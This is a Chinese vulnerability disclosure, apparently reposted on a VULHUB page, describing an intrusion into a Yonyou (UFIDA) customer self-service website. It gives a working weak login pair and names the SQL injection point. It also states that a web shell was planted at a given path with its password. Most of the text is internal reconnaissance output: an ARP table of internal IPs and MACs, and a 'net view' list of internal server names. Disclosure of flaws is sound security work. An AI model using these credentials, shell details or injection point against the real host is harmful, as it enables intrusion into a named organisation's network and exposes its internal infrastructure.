|用友某系统从弱口令到sql注射到getshell - VULHUB开源网络安全威胁库

用友某系统从弱口令到sql注射到getshell

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：弱口令、sql注射、getshell ### 详细说明：系统地址： http://vip.ufida.com.cn/Frame/Index.aspx [<img src="https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg" alt="QQ截图20151021162136.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg) 弱口令帐号：adminnc 密码：adminnc [<img src="https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg" alt="QQ截图20151021162437.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg) 在自助查询处，发现注入（需要登录，注意cookie有时效） [<img src="https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg" alt="QQ截图20151021162521.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg) ``` GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: vip.ufida.com.cn Connection: Keep-Alive Cookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe ``` [<img src="https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg" alt="QQ截图20151021163123.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg) 支持union sa权限 [<img src="https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg" alt="QQ截图20151021163229.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg" alt="QQ截图20151021163307.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg) 可内网 [<img src="https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg" alt="QQ截图20151021163526.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg) [<img src="https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg" alt="QQ截图20151021164007.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg) 找到web根路径后写shell ``` http://vip.ufida.com.cn/wooyun.aspx ``` 密码wpp [<img src="https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg" alt="QQ截图20151021164403.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg) 支持union就是快 ``` D:\E_data\战略客户自助系统网站\wwwroot\> arp -a Interface: 192.168.8.90 --- 0x10003 Internet Address Physical Address Type 192.168.8.2 00-50-56-83-0c-49 dynamic 192.168.8.3 00-50-56-83-0c-50 dynamic 192.168.8.4 00-50-56-83-30-ab dynamic 192.168.8.7 00-50-56-83-56-6e dynamic 192.168.8.9 00-0f-e2-30-7f-c9 dynamic 192.168.8.32 00-50-56-83-4b-1a dynamic 192.168.8.38 00-21-28-14-c9-ba dynamic 192.168.8.57 70-e2-84-07-31-18 dynamic 192.168.8.67 c4-ca-d9-c6-d0-58 dynamic 192.168.8.72 70-e2-84-07-31-e4 dynamic 192.168.8.77 00-15-17-ce-9f-31 dynamic 192.168.8.80 90-e2-ba-5d-ac-1f dynamic 192.168.8.83 90-e2-ba-57-f9-97 dynamic 192.168.8.105 e8-39-35-22-42-42 dynamic 192.168.8.112 3c-e5-a6-af-21-b5 dynamic 192.168.8.113 00-1a-4b-de-ae-ae dynamic 192.168.8.114 70-e2-84-07-31-18 dynamic 192.168.8.118 00-1e-68-78-f8-a9 dynamic 192.168.8.119 70-e2-84-07-31-e4 dynamic 192.168.8.134 00-50-56-83-36-20 dynamic 192.168.8.135 00-15-17-b7-1b-15 dynamic 192.168.8.136 00-50-56-83-00-02 dynamic 192.168.8.137 00-50-56-83-00-36 dynamic 192.168.8.138 00-50-56-83-53-95 dynamic 192.168.8.151 00-25-b3-25-a6-a2 dynamic 192.168.8.153 00-50-56-83-0b-84 dynamic 192.168.8.156 00-21-28-14-ca-92 dynamic 192.168.8.164 00-50-56-83-4a-e9 dynamic 192.168.8.168 00-50-56-83-12-69 dynamic 192.168.8.174 70-e2-84-07-31-e4 dynamic 192.168.8.180 00-50-56-83-6c-e3 dynamic 192.168.8.184 00-50-56-83-0c-8e dynamic 192.168.8.192 00-50-56-83-2f-8f dynamic 192.168.8.196 00-50-56-83-3b-08 dynamic 192.168.8.197 c8-9c-dc-33-ad-37 dynamic 192.168.8.199 00-1a-4b-de-18-82 dynamic 192.168.8.200 00-0c-29-29-0b-1c dynamic 192.168.8.201 00-15-17-5f-0d-59 dynamic 192.168.8.203 00-e0-81-d2-d8-49 dynamic 192.168.8.210 d4-85-64-4b-c0-b8 dynamic 192.168.8.211 00-50-56-83-5c-e1 dynamic 192.168.8.212 f8-bc-12-4e-9c-06 dynamic 192.168.8.213 00-50-56-83-00-1d dynamic 192.168.8.214 00-e0-81-de-99-5b dynamic 192.168.8.215 00-00-5e-00-01-0f dynamic 192.168.8.216 00-23-7d-57-8a-88 dynamic 192.168.8.217 00-23-7d-56-60-dc dynamic 192.168.8.218 00-23-7d-56-60-dc dynamic 192.168.8.219 18-a9-05-60-b9-e0 dynamic 192.168.8.220 18-a9-05-46-3a-08 dynamic 192.168.8.221 00-14-5e-1c-81-3f dynamic 192.168.8.222 00-00-5e-00-01-05 dynamic 192.168.8.223 00-50-56-83-63-72 dynamic 192.168.8.224 18-a9-05-53-0f-64 dynamic 192.168.8.225 44-1e-a1-4d-31-06 dynamic 192.168.8.226 00-50-56-83-46-9f dynamic 192.168.8.227 00-00-5e-00-01-09 dynamic 192.168.8.228 00-50-56-83-00-8d dynamic 192.168.8.229 00-a0-b8-56-26-92 dynamic 192.168.8.230 00-21-97-02-8f-c1 dynamic 192.168.8.231 00-50-56-83-05-f8 dynamic 192.168.8.233 00-21-28-f1-7e-ce dynamic 192.168.8.234 00-1a-4b-de-bf-7a dynamic 192.168.8.236 00-e0-81-dc-26-4b dynamic 192.168.8.237 00-e0-81-d8-54-e7 dynamic 192.168.8.238 00-50-56-83-2b-41 dynamic 192.168.8.239 00-a0-b8-56-26-50 dynamic 192.168.8.240 00-15-17-da-a6-50 dynamic 192.168.8.241 18-a9-05-40-af-d2 dynamic 192.168.8.242 00-e0-81-de-9b-96 dynamic 192.168.8.243 00-21-97-42-80-d8 dynamic 192.168.8.244 3c-d9-2b-f6-ef-70 dynamic 192.168.8.245 00-e0-81-d7-72-37 dynamic 192.168.8.246 00-50-56-83-47-d8 dynamic 192.168.8.247 00-90-fb-44-fe-8a dynamic 192.168.8.248 c4-ca-d9-de-c2-8a dynamic 192.168.8.249 c4-ca-d9-de-32-01 dynamic 192.168.8.251 00-50-56-83-29-2c dynamic 192.168.8.253 00-15-60-a2-94-81 dynamic 192.168.8.254 00-e0-86-17-b1-0d dynamic ``` [<img src="https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg" alt="QQ截图20151021164507.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg) [<img src="https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg" alt="QQ截图20151021164542.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg) ``` D:\E_data\战略客户自助系统网站\wwwroot\> net view 服务器名称注释 ------------------------------------------------------------------------------- \\BG-DC-01 \\BG-DC-02 \\BGVC \\BI \\CAIWUAPPS CaiWuApps \\CASERVER \\CWHR \\DDFWS-C117DB6F3 \\EVENTLOG \\FTPSERVER \\GSALEDB \\IMC-01 imc-01 \\IMC-02 imc-02 \\IMC-03 \\IMC-04 imc-04 \\IMCPT \\IT-36800 \\IT_FAWEN_09_25 \\ITCOMMDATASERVE \\ITDATABASE \\ITTFS \\ITTFS2010 \\JTSJJCB-2012-01 \\KMS08 \\MSNCASRV_09_26 \\PORTAL8211 portal \\SALEAPP \\SALES_MANAGEMEN \\SUP2008 \\TKR TKR \\U8SERVICE \\UF-BG-TEMPLATES \\UF200703009 \\UF200703055A \\UF200703073 \\UF200802416 \\UF200903057 \\UF200903072 \\UF200903079 \\UF201003115 \\UF201103087 \\UF2013-PCAS \\UFAPP \\UFBGDC01 \\UFCUSDB \\UFCWSERVER2 \\UFEDGESRV \\UFGOV-KAOQIN \\UFGROUP ufgroup \\UFGROUP2013 \\UFGROUPAPP2 \\UFIDA-D79A6DC9F \\UFIDA-WINS \\UFIDASERVER1 \\UFIDASRV2 \\UFIDAWEBDATA \\UFNAS1 \\UFPARK \\UFPARK_BAK_10_0 \\UFPMP \\UFPORTALSRV ufpo \\UFREGISTER2 \\UFSEA \\UFSEADB \\UFSEARCH \\UFSERVERDB \\UFTDC11 \\VIP \\VPN_LOG \\WEBSUPPORT we \\WIN-7NNI89H987C \\WIN-9QKG6QS0TNM \\WSUS02 \\XHZWEBCOUNT \\XMGLNET UFPMP \\YONYOU-129D63B7 命令成功完成。 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™